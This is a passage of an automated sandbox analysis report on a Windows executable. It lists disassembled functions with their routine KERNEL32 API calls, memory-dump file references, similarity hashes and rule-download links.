                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: QueryVirtual$CurrentDirectoryEnvironmentErrorInfoLastSystemVariable
                                                                                                                                              • String ID: :$=
                                                                                                                                              • API String ID: 209584734-2134709475
                                                                                                                                              • Opcode ID: 7837df4854f14fedd5cad5387f30d956a8220b4b58952e3805e09611b5b97e4a
                                                                                                                                              • Instruction ID: a6265404f4273ac2f1c7f86b0694fd07e9fa6f724056c34767095232113bf715
                                                                                                                                              • Opcode Fuzzy Hash: 7837df4854f14fedd5cad5387f30d956a8220b4b58952e3805e09611b5b97e4a
                                                                                                                                              • Instruction Fuzzy Hash: D311C331A042B98BCF31AF78A8442DEBB745B4A314F8501DFE59453241CA385E92CF59
                                                                                                                                              Function 00416C60 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00416C83
                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 00416C93
                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 00416CF4
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                              • String ID: DEBUG$DirectX Reports Reboot Required
                                                                                                                                              • API String ID: 1611563598-3080797097
                                                                                                                                              • Opcode ID: b2194924fa359db824beff28826ac9d5e50a418adaf161a9184b89560ac98817
                                                                                                                                              • Instruction ID: b7ca4d720214f3a145d37d4fa28bcfc633ca5049e0a52a545d8ad53e3cccdc6a
                                                                                                                                              • Opcode Fuzzy Hash: b2194924fa359db824beff28826ac9d5e50a418adaf161a9184b89560ac98817
                                                                                                                                              • Instruction Fuzzy Hash: 6C110C713803415BD3205728DC41BE77794DB56715F06041BF9D5572C1DABAD4C4C2BA
                                                                                                                                              Function 004248C5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13libraryloaderCOMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(mscoree.dll), ref: 004248CA
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004248DA
                                                                                                                                              • ExitProcess.KERNEL32 ref: 004248EE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressExitHandleModuleProcProcess
                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                              • API String ID: 75539706-1276376045
                                                                                                                                              • Opcode ID: 6b24fa057879b27e84c07b851d12f55b6a5d25cb9880573ffe5691b15abb3787
                                                                                                                                              • Instruction ID: 1eadc9780b94b6718706bd16444dc68ece41e54e59adc106cdd0224a4c3c19fa
                                                                                                                                              • Opcode Fuzzy Hash: 6b24fa057879b27e84c07b851d12f55b6a5d25cb9880573ffe5691b15abb3787
                                                                                                                                              • Instruction Fuzzy Hash: DAD0C778351341BBD7103F70DD5AE2A7654EF42F0670504357805D0061CB38C900ED2A
                                                                                                                                              Function 0042A412 Relevance: 7.7, APIs: 5, Instructions: 184COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,00424291,?), ref: 0042A4C5
                                                                                                                                              • InterlockedExchange.KERNEL32(00480B80,00000001), ref: 0042A543
                                                                                                                                              • InterlockedExchange.KERNEL32(00480B80,00000000), ref: 0042A5A8
                                                                                                                                              • InterlockedExchange.KERNEL32(00480B80,00000001), ref: 0042A5CC
                                                                                                                                              • InterlockedExchange.KERNEL32(00480B80,00000000), ref: 0042A62C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExchangeInterlocked$QueryVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2947987494-0
                                                                                                                                              • Opcode ID: 0297ce39435e4b8cf295999e0ec9787d67faa8cead9ee7d4ded0a95dc7049a43
                                                                                                                                              • Instruction ID: dd5010c10e1d9b9ba543a85cf015812fd413b34cf2729769e49068ff06a4fc39
                                                                                                                                              • Opcode Fuzzy Hash: 0297ce39435e4b8cf295999e0ec9787d67faa8cead9ee7d4ded0a95dc7049a43
                                                                                                                                              • Instruction Fuzzy Hash: FE5107307106219FCB248B58E98472B73A0EB91758FA9856BDC4187291D378EC96874F
                                                                                                                                              Function 0042D4F6 Relevance: 7.7, APIs: 5, Instructions: 172COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetStartupInfoA.KERNEL32(?), ref: 0042D553
                                                                                                                                              • GetFileType.KERNEL32(?), ref: 0042D5FD
                                                                                                                                              • GetStdHandle.KERNEL32(-000000F6), ref: 0042D67E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileHandleInfoStartupType
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2461013171-0
                                                                                                                                              • Opcode ID: 0b4af883c50a95dcf51d24fd18dda45df69003270a224a9e762e8201fdac76db
                                                                                                                                              • Instruction ID: 44458137fe5f849726c5f7ea3ed5670e5a8521186f189f810873b1cd4ff4ad7e
                                                                                                                                              • Opcode Fuzzy Hash: 0b4af883c50a95dcf51d24fd18dda45df69003270a224a9e762e8201fdac76db
                                                                                                                                              • Instruction Fuzzy Hash: BA51C571A043118FD720CF28E84476B77E4FB16328F558A2ED5AAC72E1DB78D849C719
                                                                                                                                              Function 0042EF95 Relevance: 7.7, APIs: 5, Instructions: 169COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000000,?), ref: 0042F0C8
                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000000,00000000,?,00000000), ref: 0042F129
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiWide
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 626452242-0
                                                                                                                                              • Opcode ID: 1b18a38131ce7fce63ae30e6e84db181954860e2b4c12b5ea27fecefa44c3926
                                                                                                                                              • Instruction ID: 9f89b8dcf7f770c9608733cc378f38016b5008aa602b2969820ed4e513d82528
                                                                                                                                              • Opcode Fuzzy Hash: 1b18a38131ce7fce63ae30e6e84db181954860e2b4c12b5ea27fecefa44c3926
                                                                                                                                              • Instruction Fuzzy Hash: 9E51BE71A0016AAF8F20DF64EC808BFB7B9FB45304BD5853FEA1183252D7359D498B59
                                                                                                                                              Function 00428338 Relevance: 7.6, APIs: 5, Instructions: 150COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 118dc5757c2c4c7984d9873d44fd404751a60e15956d8b869370170dd54cf642
                                                                                                                                              • Instruction ID: caa39dc95d6f33b0c3bcdbfead75a80356606b39845c86f44a5aa7fea5f7728a
                                                                                                                                              • Opcode Fuzzy Hash: 118dc5757c2c4c7984d9873d44fd404751a60e15956d8b869370170dd54cf642
                                                                                                                                              • Instruction Fuzzy Hash: FB41E3B1E021769B8F20BF65BC844AF7A74EA02728790412FF914A6251EB3C4D40CB9D
                                                                                                                                              Function 0042EE6F Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 99COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,V^B,000000FF,00000000,00000000,00000000,00000000,?,?,?,0042EF91,?,00000000,00000000,00000000), ref: 0042EED4
                                                                                                                                              • GetLastError.KERNEL32(?,?,?,0042EF91,?,00000000,00000000,00000000,00425E56,00000000,00000000,00000000), ref: 0042EEDE
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,V^B,V^B,00000000,00000000,?,?,?,0042EF91,?,00000000,00000000,00000000,00425E56,00000000), ref: 0042EF33
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,V^B,000000FF,00000000,00000000,00000000,00000000,?,?,?,0042EF91,?,00000000,00000000,00000000), ref: 0042EF5A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                              • String ID: V^B
                                                                                                                                              • API String ID: 1717984340-731569014
                                                                                                                                              • Opcode ID: 8cb481713cc4cd55ac97c91bae78a6b5e8eb1afb9d0bac2b8ca7cde3352df9ed
                                                                                                                                              • Instruction ID: 43b45739b5ed72f5805475e1443a07ab786b8dc6a3ef61d40b9e5f9b077d0ce1
                                                                                                                                              • Opcode Fuzzy Hash: 8cb481713cc4cd55ac97c91bae78a6b5e8eb1afb9d0bac2b8ca7cde3352df9ed
                                                                                                                                              • Instruction Fuzzy Hash: F8313830300239FFCB118F26EE80A6B7BA5FF06760FA64556F520962A0C3368C50C7A9
                                                                                                                                              Function 0042686A Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 103COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __lock.LIBCMT ref: 0042688E
                                                                                                                                                • Part of subcall function 00429838: EnterCriticalSection.KERNEL32(?,?,?,00423F79,00000004,0044C938,0000000C,00423FDD,000000E0,00424008,?,004369E6,?,?,?,00443BF8), ref: 00429860
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
